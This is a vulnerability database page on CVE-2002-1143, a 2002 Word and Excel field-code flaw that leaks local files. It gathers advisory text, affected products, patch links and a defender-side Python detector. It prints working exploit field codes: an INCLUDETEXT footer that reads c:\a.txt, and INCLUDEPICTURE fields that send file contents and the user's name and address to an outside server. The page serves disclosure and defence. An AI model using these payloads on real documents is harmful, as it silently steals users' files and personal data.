CVE-2002-1143
CVSS 5.0
Published: 2003-04-11 00:00:00
Last revised: 2016-10-17 22:24:01

[Original text] Microsoft Word and Excel allow remote attackers to steal sensitive information via certain field codes that insert the information when the document is returned to the attacker, as demonstrated in Word using (1) INCLUDETEXT or (2) INCLUDEPICTURE, aka "Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure."


[CNNVD] Microsoft Word INCLUDETEXT Document Sharing Remote File Disclosure Vulnerability (MS02-059) (CNNVD-200304-102)

        
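        Microsoft Word and Excel are popular office applications. The INCLUDETEXT field code is used to insert an arbitrary local file into a document.
        The INCLUDETEXT field code (also called an external update) has a security problem: a remote attacker can exploit this vulnerability to obtain the contents of arbitrary files on the target user's system.
        Word and Excel provide a mechanism for inserting data from one document into another and keeping it updated. This mechanism is called field codes in Word and external updates in Excel, and it reduces the amount of manual work for the user. For example, a Word field code can insert a standard legal disclaimer paragraph into a document, and an external update in Excel can automatically update charts across different worksheets.
        Malicious use of field codes and external updates can lead to theft of user information without any prompt. Certain events trigger field code and external update refreshes, such as saving the document or the user manually updating links. Users would normally notice these update operations, but specially constructed field codes or external updates can run without any indication, so that a malicious document built by the attacker updates its included content when it is opened.
        For example, an INCLUDETEXT field code (also called an internal update) can be included in a Word document and can reference any file on the target user's local system; when the target user then sends the document on, the included local file is sent with it. In a network sharing environment an attacker can exploit this vulnerability to obtain files from other users' local systems.
        To exploit this vulnerability, an attacker can host a malicious Word document on a web page and lure a vulnerable user into viewing it.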
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:microsoft:word:2002  Microsoft Word 2002
cpe:/a:microsoft:excel:2002:sp2  Microsoft Excel 2002 SP2
cpe:/a:microsoft:word:98::mac
cpe:/a:microsoft:word:::mac
cpe:/a:microsoft:word:2001::mac
cpe:/a:microsoft:word:2002:sp2  Microsoft Word 2002 sp2
cpe:/a:microsoft:word:2000:sr1  Microsoft Word 2000 sr1
cpe:/a:microsoft:word:2002:sp1  Microsoft Word 2002 sp1
cpe:/a:microsoft:word:2000  Microsoft Word 2000
cpe:/a:microsoft:word:98:::japanese
cpe:/a:microsoft:word:2000:sp2  Microsoft Word 2000 sp2
cpe:/a:microsoft:word:97:sr1  Microsoft Word 97 sr1
cpe:/a:microsoft:excel:2002:sp1  Microsoft Excel 2002 SP1
cpe:/a:microsoft:word:97:sr2  Microsoft Word 97 sr2
cpe:/a:microsoft:word:2000:sr1a  Microsoft Word 2000 sr1a
cpe:/a:microsoft:word:97  Microsoft Word 97
cpe:/a:microsoft:word:98  Microsoft Word 98
cpe:/a:microsoft:excel:2002  Microsoft Excel 2002

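- OVAL (technical details for detection)

oval:org.mitre.oval:def:202  Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it are available in the related OVAL definition.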

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1143
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1143
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-102
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=103040003014999&w=2
(UNKNOWN)  BUGTRAQ  20020826 Security side-effects of Word fields
http://marc.info/?l=bugtraq&m=103252858816401&w=2
(UNKNOWN)  BUGTRAQ  20020919 More vulnerabilities (Re: Security side-effects of Word fields)
http://www.iss.net/security_center/static/10008.php
(VENDOR_ADVISORY)  XF  word-includetext-read-files(10008)
http://www.iss.net/security_center/static/10155.php
(UNKNOWN)  XF  word-includepicture-read-files(10155)
http://www.kb.cert.org/vuls/id/899713
(UNKNOWN)  CERT-VN  VU#899713
http://www.microsoft.com/technet/security/bulletin/ms02-059.asp
(VENDOR_ADVISORY)  MS  MS02-059
http://www.microsoft.com/technet/treeview/default.asp?url=/Technet/security/topics/secword.asp
(UNKNOWN)  CONFIRM  http://www.microsoft.com/technet/treeview/default.asp?url=/Technet/security/topics/secword.asp
http://www.securityfocus.com/bid/5586
(VENDOR_ADVISORY)  BID  5586
http://www.securityfocus.com/bid/5764
(UNKNOWN)  BID  5764

- Vulnerability information

Microsoft Word INCLUDETEXT Document Sharing Remote File Disclosure Vulnerability (MS02-059)
Medium risk  Design error
2003-04-11 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS02-059) and corresponding patches for this issue:
        MS02-059: Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure (Q330008)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS02-059.asp

        Patch downloads:
         * Microsoft Word 2002:
        
        http://office.microsoft.com/downloads/2002/wrd1005.aspx

         * Microsoft Word 2000:
        
        http://office.microsoft.com/downloads/2000/wrd0902.aspx

         * Word 97/Word 98(J):
         Information on receiving Word 97 & Word 98(J) support is available
         at:
        
        http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q330080

         * Word X for Macintosh:
        
        http://www.microsoft.com/mac/download/security.asp

         * Word 2001 for Macintosh:
        
        http://www.microsoft.com/mac/download/security.asp

         * Word 98 for Macintosh:
        
        http://www.microsoft.com/mac/download/security.asp

         * Excel 2002:
        
        http://office.microsoft.com/downloads/2002/exc1003.aspx

- Vulnerability information (21764)

MS Word 95/97/98/2000/2002 Excel 2002 INCLUDETEXT Document Sharing File Disclosure (EDBID:21764)
windows remote
2002-08-26 Verified
0 Alex Gantman
N/A
source: http://www.securityfocus.com/bid/5586/info

The Microsoft Word and Excel INCLUDETEXT Field Code may be used to insert an arbitrary local file into a document. The INCLUDETEXT Field Code is reported to, under some circumstances, present a security threat.

If the INCLUDETEXT Field Code is included in a document and references a file on the local system of the recipient, then the file will also be included when the document is sent out. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.

The recipient of the malicious document must still pass along the updated version of the document for the attacker to receive the imported local file.

** Reports indicate that using a 'dde' link group field may be able to bypass the functionality of the Microsoft patch for this issue.

Inserting the following field structure into the footer of the last page of the document will steal the contents of c:\a.txt on the target's computer:

{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\\a.txt" "c:\\a.txt" } \* MERGEFORMAT } = "" "" \* MERGEFORMAT }

(The curly braces above represent Microsoft Word field braces.)


		

- Vulnerability information (21812)

MS Word 95/97/98/2000/2002 INCLUDEPICTURE Document Sharing File Disclosure (EDBID:21812)
windows remote
2002-09-20 Verified
0 Richard Edwards
N/A
source: http://www.securityfocus.com/bid/5764/info

The INCLUDEPICTURE Field Code may be used to insert arbitrary URLs into a document. The INCLUDEPICTURE Field Code is reported to, under some circumstances, present a security threat.

If the INCLUDEPICTURE Field Code is included in a document and references a URL, it may be possible for the attacker to obtain contents of files on the victim user's system. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.

An attacker can potentially exploit this vulnerability to obtain the contents of files residing on a victim user's system. 

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { USERADDRESS } } \d }

(The curly braces above represent Microsoft Word field braces.)
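
A defender-side check for the nested field patterns shown in the two entries above, as an added example that is not part of the original advisories: it parses field codes written in the brace notation used on this page and flags an INCLUDETEXT that resolves to a drive-letter path and an INCLUDEPICTURE whose URL is assembled from nested fields. It assumes the field instructions have already been extracted from the document as text; `audit`, the rule names and the path regex are illustrative, and braces inside quoted strings are not handled.

```python
import re
# Drive-letter path such as c:\ (the lookbehind keeps "http:\\" from matching).
LOCAL_PATH = re.compile(r"(?<![A-Za-z])[A-Za-z]:\\")

def parse_fields(text):
    """Turn brace-notation field codes into a tree of {name, instr, children}."""
    node = root = {"name": None, "instr": "", "children": []}
    stack = []
    for ch in text:
        if ch == "{":
            child = {"name": None, "instr": "", "children": []}
            node["children"].append(child)
            stack.append(node)
            node = child
        elif ch == "}":
            if not stack:
                raise ValueError("unbalanced field braces")
            words = node["instr"].split()
            node["name"] = words[0].upper() if words else ""
            node = stack.pop()
        else:
            node["instr"] += ch
    if stack:
        raise ValueError("unbalanced field braces")
    return root["children"]

def subtree_text(node):
    return node["instr"] + "".join(subtree_text(c) for c in node["children"])
def names_below(node):
    return {n for c in node["children"] for n in {c["name"]} | names_below(c)}

def audit(text):
    """Return (rule, nesting depth, sorted nested field names) per finding."""
    out = []
    def walk(node, depth):
        nested = sorted(names_below(node))
        if node["name"] == "INCLUDETEXT" and LOCAL_PATH.search(subtree_text(node)):
            out.append(("includetext-local-file", depth, nested))
        if node["name"] == "INCLUDEPICTURE" and nested:
            out.append(("includepicture-computed-url", depth, nested))
        for c in node["children"]:
            walk(c, depth + 1)
    for field in parse_fields(text):
        walk(field, 0)
    return out

# Inputs: two of the field structures quoted on this page.
FOOTER = r'{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\\a.txt" "c:\\a.txt" } \* MERGEFORMAT } = "" "" \* MERGEFORMAT }'
PICTURE = r'{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }'
```

The nesting depth and the list of nested field names are what separate these structures from an ordinary INCLUDEPICTURE with a literal URL, which produces no finding.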

		

- Vulnerability information

10733
Microsoft Word/Excel Shared Document INCLUDETEXT Field Arbitrary File Read

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-08-26 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Microsoft Word INCLUDEPICTURE Document Sharing File Disclosure Vulnerability
Design Error 5764
Yes No
2002-09-20 12:00:00 2009-07-11 05:06:00
Discovery of this vulnerability credited to Richard Edwards.

- Affected program versions

Microsoft Word 98
Microsoft Word 97 SR2
Microsoft Word 97 SR1
Microsoft Word 97
+ Microsoft Office 97
Microsoft Word 95
Microsoft Word 2002 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 alpha
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Word 2002
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 alpha
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Word 2000 SR1a
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Word 2000 SR1
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Word 2000 SP2
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Word 2000
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0


- Exploit

The following examples were submitted by Alex Gantman <agantman@qualcomm.com>:

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { USERADDRESS } } \d }

(The curly braces above represent Microsoft Word field braces.)

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
